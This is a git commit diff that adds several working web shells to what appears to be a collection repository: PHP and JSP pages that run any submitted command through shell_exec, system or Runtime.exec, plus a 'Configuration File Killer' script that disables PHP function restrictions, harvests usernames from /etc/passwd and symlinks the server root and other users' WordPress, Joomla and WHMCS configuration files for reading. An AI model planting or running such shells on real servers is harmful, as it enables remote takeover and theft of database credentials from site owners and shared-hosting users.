Rename old files with long names and add new web-shells

Author: JohnTroony

Collection/AK-74 Security Team Web Shell Beta Version.php Collection/AK-74.php

@@ -0,0 +1,75 @@
+<?php
+if (!empty($_POST['cmd'])) {
+    $cmd = shell_exec($_POST['cmd']);
+}
+?>
+<!DOCTYPE html>
+<html>
+<!-- By Artyum (https://github.com/artyuum) -->
+<head>
+
+    <meta charset="utf-8">
+
+    <meta http-equiv="X-UA-Compatible" content="IE=edge">
+
+    <meta name="viewport" content="width=device-width, initial-scale=1">
+
+    <link rel="stylesheet" type="text/css" href="//bootswatch.com/4/flatly/bootstrap.min.css">
+
+    <title>Web Shell</title>
+
+    <style>
+        h2 {
+            color: rgba(0, 0, 0, .75);
+        }
+
+        pre {
+            padding: 15px;
+            -webkit-border-radius: 5px;
+            -moz-border-radius: 5px;
+            border-radius: 5px;
+            background-color: #ECF0F1;
+        }
+
+        .container {
+            width: 850px;
+        }
+    </style>
+
+</head>
+
+<body>
+
+    <div class="container">
+
+        <div class="pb-2 mt-4 mb-2">
+	    <h1>PHP Shell</h1>
+            <h2> Execute a command </h2>
+        </div>
+
+        <form method="POST">
+            <div class="form-group">
+                <label for="cmd"><strong>Command</strong></label>
+                <input type="text" class="form-control" name="cmd" id="cmd" value="<?= htmlspecialchars($_POST['cmd'], ENT_QUOTES, 'UTF-8') ?>" required>
+            </div>
+            <button type="submit" class="btn btn-primary">Execute</button>
+        </form>
+
+<?php if ($cmd): ?>
+        <div class="pb-2 mt-4 mb-2">
+            <h2> Output </h2>
+        </div>
+        <pre>
+<?= htmlspecialchars($cmd, ENT_QUOTES, 'UTF-8') ?>
+        </pre>
+<?php elseif (!$cmd && $_SERVER['REQUEST_METHOD'] == 'POST'): ?>
+        <div class="pb-2 mt-4 mb-2">
+            <h2> Output </h2>
+        </div>
+        <pre><small>No result.</small></pre>
+<?php endif; ?>
+    </div>
+
+</body>
+
+</html>

Collection/Antichat Shell.php Collection/Antichat_Shell.php

@@ -0,0 +1,9 @@
+<?php
+if(isset($_REQUEST['cmd']) ){
+echo "<pre>";
+$cmd = ($_REQUEST['cmd']);
+system($cmd);
+echo "</pre>";
+die;
+}
+?>

Collection/Ayyildiz Tim.php Collection/Ayyildiz_Tim.php

@@ -0,0 +1,228 @@
+<?php
+
+
+ $head = '
+<html>
+<head>
+</script>
+<title>--==[[Configuration File Killer By Ion Kros]]==--</title>
+<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
+
+<STYLE>
+body {
+font-family: Tahoma
+}
+tr {
+BORDER: dashed 1px #333;
+color: #FFF;
+}
+td {
+BORDER: dashed 1px #333;
+color: #FFF;
+}
+.table1 {
+BORDER: 0px Black;
+BACKGROUND-COLOR: Black;
+color: #FFF;
+}
+.td1 {
+BORDER: 0px;
+BORDER-COLOR: #333333;
+font: 7pt Verdana;
+color: Green;
+}
+.tr1 {
+BORDER: 0px;
+BORDER-COLOR: #333333;
+color: #FFF;
+}
+table {
+BORDER: dashed 1px #333;
+BORDER-COLOR: #333333;
+BACKGROUND-COLOR: Black;
+color: #FFF;
+}
+input {
+border			: dashed 1px;
+border-color		: #333;
+BACKGROUND-COLOR: Black;
+font: 8pt Verdana;
+color: Red;
+}
+select {
+BORDER-RIGHT:  Black 1px solid;
+BORDER-TOP:    #DF0000 1px solid;
+BORDER-LEFT:   #DF0000 1px solid;
+BORDER-BOTTOM: Black 1px solid;
+BORDER-color: #FFF;
+BACKGROUND-COLOR: Black;
+font: 8pt Verdana;
+color: Red;
+}
+submit {
+BORDER:  buttonhighlight 2px outset;
+BACKGROUND-COLOR: Black;
+width: 30%;
+color: #FFF;
+}
+textarea {
+border			: dashed 1px #333;
+BACKGROUND-COLOR: Black;
+font: Fixedsys bold;
+color: #999;
+}
+BODY {
+	SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
+margin: 1px;
+color: Red;
+background-color: Black;
+}
+.main {
+margin			: -287px 0px 0px -490px;
+BORDER: dashed 1px #333;
+BORDER-COLOR: #333333;
+}
+.tt {
+background-color: Black;
+}
+
+A:link {
+	COLOR: White; TEXT-DECORATION: none
+}
+A:visited {
+	COLOR: White; TEXT-DECORATION: none
+}
+A:hover {
+	color: Red; TEXT-DECORATION: none
+}
+A:active {
+	color: Red; TEXT-DECORATION: none
+}
+</STYLE>
+<script language=\'javascript\'>
+function hide_div(id)
+{
+  document.getElementById(id).style.display = \'none\';
+  document.cookie=id+\'=0;\';
+}
+function show_div(id)
+{
+  document.getElementById(id).style.display = \'block\';
+  document.cookie=id+\'=1;\';
+}
+function change_divst(id)
+{
+  if (document.getElementById(id).style.display == \'none\')
+    show_div(id);
+  else
+    hide_div(id);
+}
+</script>'; ?>
+<html>
+	<head>
+		<?php 
+		echo $head ;
+		echo '
+
+<table width="100%" cellspacing="0" cellpadding="0" class="tb1" >
+
+			
+
+       <td width="100%" align=center valign="top" rowspan="1">
+           <font color=red size=5 face="comic sans ms"><b>--==[[ Configuration</font><font color=white size=5 face="comic sans ms"><b>  File Killer By</font><font color=green size=5 face="comic sans ms"><b> Team IndiShell ]]==--</font> <div class="hedr"> 
+
+        <td height="10" align="left" class="td1"></td></tr><tr><td 
+        width="100%" align="center" valign="top" rowspan="1"><font 
+        color="red" face="comic sans ms"size="1"><b> 
+        <font color=red> 
+        ####################################################</font><font color=white>#####################################################</font><font color=green>####################################################</font><br><font color=white>-==[[Greetz to]]==--</font><br>   Guru ji zero ,code breaker ica, Aasim shaikh, Raman kumar rana,INX_r0ot,Darkwolf indishell, Chinmay Pandya ,Silent poison India,Magnum sniper,Atul Dwivedi,ethicalnoob Indishell,Local root indishell,Irfninja indishell<br>cool toad,cool shavik, Ebin V Thomas,Dinelson Amine ,Mr. Trojan,rad paul,Godzila,mike waals,Neo hacker ICA, Golden boy INDIA,Ketan Singh,Yash,Reborn India,Alicks,Aneesh Dogra,silent hacker,lovetherisk<br>Suriya Prakash,cyber gladiator,Ashell india,Cyber Ace,hero,Minhal Mehdi ,Raj bhai ji,cold fire hacker,Prashant Tanwar, VikAs ViKi ,Rakesh, Bhuppi,Mohit, Ffe ^_^,Ashish,Shardhanand,Bhuppi and rest of TEAM INDISHELL<br>
+
+<font color=white>--==[[Dedicated to]]==--</font>
+<br># SH.Kishan Singh Tanwar and my Ex Teacher Mrs. Ritu Tomer Rathi #<br><font color=white>--==[[Interface Desgined By]]==--</font><br><font color=red>Deepika Kaushik</font><br><font color=red> 
+        ####################################################</font><font color=white>#####################################################</font><font color=green>####################################################</font>
+						
+           </table>
+        
+
+'; 
+
+?>
+<body bgcolor=black><h3 style="text-align:center"><font color=red size=2 face="comic sans ms"><div align=center><table><tr><td>Welcome Bhai ji :) .. Configuration file killer welcomes you _/\_ </font><br></td></tr></table>
+<form method=post><font color=white size=2 face="comic sans ms">The button given below generates php.ini file :)</font><p>
+<input type=submit name=ini value="use to Generate PHP.ini" /></form>
+<form method=post><font color=white size=2 face="comic sans ms">The button given below extract usernames for symlink :)</font><p>
+	<input type=submit name="usre" value="use to Extract usernames" /></form>
+	
+	<?php
+	if(isset($_POST['ini']))
+	{
+		
+		$r=fopen('php.ini','w');
+		$rr=" disbale_functions=none ";
+		fwrite($r,$rr);
+		$link="<a href=php.ini><font color=white size=2 face=\"comic sans ms\"><u>open this link in new tab to run PHP.INI</u></font></a>";
+		echo $link;
+		
+		}
+	
+	
+	
+	?>
+	
+	
+	<?php
+	if(isset($_POST['usre'])){
+		?><form method=post>
+	<textarea rows=10 cols=50 name=user><?php  $users=file("/etc/passwd");
+foreach($users as $user)
+{
+$str=explode(":",$user);
+echo $str[0]."\n";
+}
+
+?></textarea><br><br>
+	<input type=submit name=su value="bhaiyu ^_^ .. lets start" /></form>
+	<?php } ?>
+	<?php
+	error_reporting(0);
+	echo "<font color=red size=2 face=\"comic sans ms\">";
+	if(isset($_POST['su']))
+	{
+	mkdir('Indishell',0777);
+$rr  = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
+$g = fopen('Indishell/.htaccess','w');
+fwrite($g,$rr);
+$indishell = symlink("/","Indishell/root");
+		    $rt="<a href=Indishell/root><font color=white size=3 face=\"comic sans ms\"> OwN3d</font></a>";
+        echo "Bhai ji .... check link given below for / folder symlink <br><u>$rt</u>";
+		
+		$dir=mkdir('INDISHELL',0777);
+		$r  = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
+        $f = fopen('INDISHELL/.htaccess','w');
+   
+        fwrite($f,$r);
+        $consym="<a href=INDISHELL/><font color=white size=3 face=\"comic sans ms\">configuration files</font></a>";
+       	echo "<br>The link given below for configuration file symlink...open it, once processing finish <br><u><font color=red size=2 face=\"comic sans ms\">$consym</font></u>";
+       	
+       		$usr=explode("\n",$_POST['user']);
+       	$configuration=array("wp-config.php","wordpress/wp-config.php","configuration.php","blog/wp-config.php","joomla/configuration.php","vb/includes/config.php","includes/config.php","conf_global.php","inc/config.php","config.php","Settings.php","sites/default/settings.php","whm/configuration.php","whmcs/configuration.php","support/configuration.php","whmc/WHM/configuration.php","whm/WHMCS/configuration.php","whm/whmcs/configuration.php","support/configuration.php","clients/configuration.php","client/configuration.php","clientes/configuration.php","cliente/configuration.php","clientsupport/configuration.php","billing/configuration.php","admin/config.php");
+		foreach($usr as $uss )
+		{
+			$us=trim($uss);
+						
+			foreach($configuration as $c)
+			{
+			 $rs="/home/".$us."/public_html/".$c;
+			 $r="INDISHELL/".$us.$c;
+			 symlink($rs,$r);
+			
+		}
+			
+			}
+		
+		
+		}
+	
+	
+	
+	?>

Collection/C99madShell.php

@@ -0,0 +1,17 @@
+<html>
+<body>
+<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
+<input type="TEXT" name="cmd" id="cmd" size="80">
+<input type="SUBMIT" value="Execute">
+</form>
+<pre>
+<?php
+    if(isset($_GET['cmd']))
+    {
+        system($_GET['cmd']);
+    }
+?>
+</pre>
+</body>
+<script>document.getElementById("cmd").focus();</script>
+</html>

Collection/CasuS 1.5.php Collection/CasuS-1.5.php

@@ -0,0 +1,32 @@
+<%@ page
+import="java.util.*,java.io.*"%>
+<%
+%>
+<HTML>
+<BODY>
+<H3>JSP SHELL</H3>
+<FORM METHOD="GET" NAME="myform"
+ACTION="">
+<INPUT TYPE="text" NAME="cmd">
+<INPUT TYPE="submit" VALUE="Execute">
+</FORM>
+<PRE>
+<%
+if (request.getParameter("cmd") != null) {
+out.println("Command: " +
+request.getParameter("cmd") + "<BR>");
+Process p =
+Runtime.getRuntime().exec(request.getParameter("cmd"));
+OutputStream os = p.getOutputStream();
+InputStream in = p.getInputStream();
+DataInputStream dis = new DataInputStream(in);
+String disr = dis.readLine();
+while ( disr != null ) {
+out.println(disr);
+disr = dis.readLine();
+}
+}
+%>
+</PRE>
+</BODY>
+</HTML>